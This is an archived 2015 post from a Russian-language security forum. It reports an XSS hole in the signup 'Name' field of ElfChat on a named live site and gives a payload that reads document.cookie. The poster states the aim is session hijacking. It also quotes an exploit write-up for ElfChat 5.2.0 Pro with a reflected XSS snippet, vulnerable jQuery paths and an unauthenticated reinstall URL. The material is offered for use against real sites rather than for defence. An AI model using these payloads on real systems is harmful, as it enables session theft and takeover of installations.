Elf xss — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

02.10.2015, 23:47

abraman

Guest

Сообщений: n/a

Провел на форуме:
702

Репутация: 0

http://yourspier.com/temp/ElfChat/signup.php

Уязвимость присутствует в скрипте для регистрации в поле "Name"

Код:

Code:
">alert("cookie: "+document.cookie);

(работает в firefox)

Задача перехват сессии, однако не совсем понятно каким образом можно сгенерировать вредоносную ссылку.

Также по теме имеется exploit

Код HTML:

HTML:
ElfChat 5.2.0 Pro Reinstall SCript EXploits
===========================================
Author : indoushka
Vondor : http://elfchat.ru/
Dork:    2011 Elfet - ElfChat 5.2.0 Pro
==========================

  
  XSS Reflected - Jquery 1.4.2 
  
  
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  

  
    
      
        alert(&#x27;xss
reflected - jquery 1.4.2 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com&#x27;);
      
    
  

===

and :

/ElfChat/js/datepicker/js/jquery.js
/ElfChat/js/min/jquery.js

Reinstall SCript :

http://127.0.0.1/ElfChat/install/index.php?act=settings